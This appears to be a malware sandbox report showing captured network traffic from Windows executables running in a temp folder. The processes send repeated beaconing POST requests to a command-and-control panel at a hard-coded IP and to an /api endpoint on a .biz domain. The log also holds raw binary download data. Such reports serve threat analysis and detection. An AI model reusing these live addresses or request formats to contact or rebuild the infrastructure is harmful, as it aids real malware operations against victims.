                                                                                                                                          Dec 8, 2024 18:06:09.971369028 CET1236INData Raw: 30 0a b1 1c 7d a7 2b 4c b2 a4 bf 01 b0 cd 33 b7 b4 b3 97 a8 44 bd 6a 96 c3 1c 22 cc 32 75 72 8a 5f e2 78 01 c9 41 24 95 36 6e bf b3 25 ff ba 4b cd 3c 59 ec a1 ee 43 c0 2a da c8 99 47 21 30 3d 3c 84 b0 7c d5 6f f7 a2 3a 19 c7 2b ec b6 ea 76 16 a5
                                                                                                                                          Data Ascii: 0}+L3Dj"2ur_xA$6n%K<YC*G!0=<|o:+v&%rG'ZJMkJ7+dGU*|`]q~_\(fUy Mle?JczlE<5D6P#Bf9#*8$] t)f4V'+;s]x4ww5~rCJ
                                                                                                                                          Dec 8, 2024 18:06:09.971380949 CET448INData Raw: af 11 98 a8 d9 5f 22 f3 33 b5 35 8d 35 56 d7 97 a5 49 fd b8 39 59 58 0f ad 1f 1e e7 25 ee f3 f2 45 5d 16 8a 16 7e bd ef d3 01 3e b5 ba 08 d8 c5 7f 0e d5 f4 4d db fe 55 fc c8 b4 6e 72 80 2e 28 1a bb 2f b2 64 80 7d cb 89 2a 4e 6b e1 a7 d7 40 82 84
                                                                                                                                          Data Ascii: _"355VI9YX%E]~>MUnr.(/d}*Nk@R'dk?BIv;96=qxY~ya@=@[317@Mzrl{G4`F_*56M=!fUm7|=Ws*P^4M69"7,/)T05
                                                                                                                                          Dec 8, 2024 18:06:09.971391916 CET1236INData Raw: 20 9a bc 36 b2 9c b1 8a 0d bc f0 a8 0d 68 d2 32 c3 04 0c 48 0c 30 78 d8 2c 4b c2 c9 9b 47 48 5f 6f be a0 ab a8 ec 89 d1 6b 6c df bd fd 03 6b cf c3 82 c5 bc b4 31 8a 4b 77 8e 95 3a 89 5c 45 02 97 0f 3a 90 da 40 fb 1a 72 ad e5 92 19 30 10 b7 7c 78
                                                                                                                                          Data Ascii: 6h2H0x,KGH_oklk1Kw:\E:@r0|x@=u#a} :!3bqq%T_)Wj _C>z${j,e.}3!ct0bH~R7MIyxc&1pu8;Ebh6(-~F/2
                                                                                                                                          Dec 8, 2024 18:06:10.094274998 CET1236INData Raw: cb 16 01 d7 bc 09 ff b6 e6 7d 3a 6a 72 19 f9 f1 c0 cc eb 50 f4 c5 52 e0 fe 31 34 f7 58 fe bb bc a6 a5 b0 a4 c2 58 98 6d 27 15 28 43 7d 1c f2 6a 1c f0 a4 7e 54 47 27 f1 9c 4f 30 af 6c bd 7f 26 b4 05 ce ec c8 7e 48 21 94 60 ae 29 d5 68 78 7a 9e ce
                                                                                                                                          Data Ascii: }:jrPR14XXm'(C}j~TG'O0l&~H!`)hxzH&}|<S+2>1h7Z;&EcagHp;Q6Ia:Wl'J[zV$gVS$XFiX/.ScZS&-wS_6 i


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449781185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:15.885423899 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 31
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 64 31 3d 31 30 31 33 32 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                          Data Ascii: d1=1013229001&unit=246122658369
                                                                                                                                          Dec 8, 2024 18:06:17.241739988 CET193INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:17 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449790185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:18.987688065 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:20.334264994 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:20 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449800185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:21.965224028 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:23.344522953 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:23 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449808185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:25.088809967 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:26.430351019 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449820185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:28.058001995 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:29.395327091 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:29 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449828185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:31.142561913 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:32.491252899 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:32 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.449836185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:34.172524929 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:35.513982058 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:35 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.449846185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:37.279103994 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:38.603209972 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:38 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.449853185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:40.330385923 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:41.708132982 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:41 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.449865185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:43.450521946 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:44.807301998 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:44 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.449872185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:46.436639071 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:47.783098936 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:47 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.449879185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:49.527124882 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:50.885409117 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:50 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.449891185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:52.591532946 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:53.938564062 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:53 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.449899185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:55.729573965 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:57.079854012 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:56 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.449905185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:58.715006113 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:07:00.065918922 CET196INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:59 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449782172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:17 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                          Data Ascii: act=life
                                                                                                                                          2024-12-08 17:06:17 UTC1019INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:17 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=0v0v18p94vstonvd4ai9fa2737; expires=Thu, 03-Apr-2025 10:52:56 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m6Rs7H%2BSVK4l8j5DdpUSbxVPEKEa0YGQG5L0voGIha3%2B9z%2Bht74sxp3LeetL7FWHrSlFACKXZt3YMhXtluBLpF5RbICAwPHg30ZcW%2BKeCoaCQjgm3Vl%2Bq0jghtuuZoxEaJseihU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee5859d9534297-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1671&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1718658&cwnd=245&unsent_bytes=0&cid=09709e7cb618c0fc&ts=773&x=0"
                                                                                                                                          2024-12-08 17:06:17 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                          Data Ascii: 2ok
                                                                                                                                          2024-12-08 17:06:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449788172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:19 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 48
                                                                                                                                          Host: atten-supporse.biz
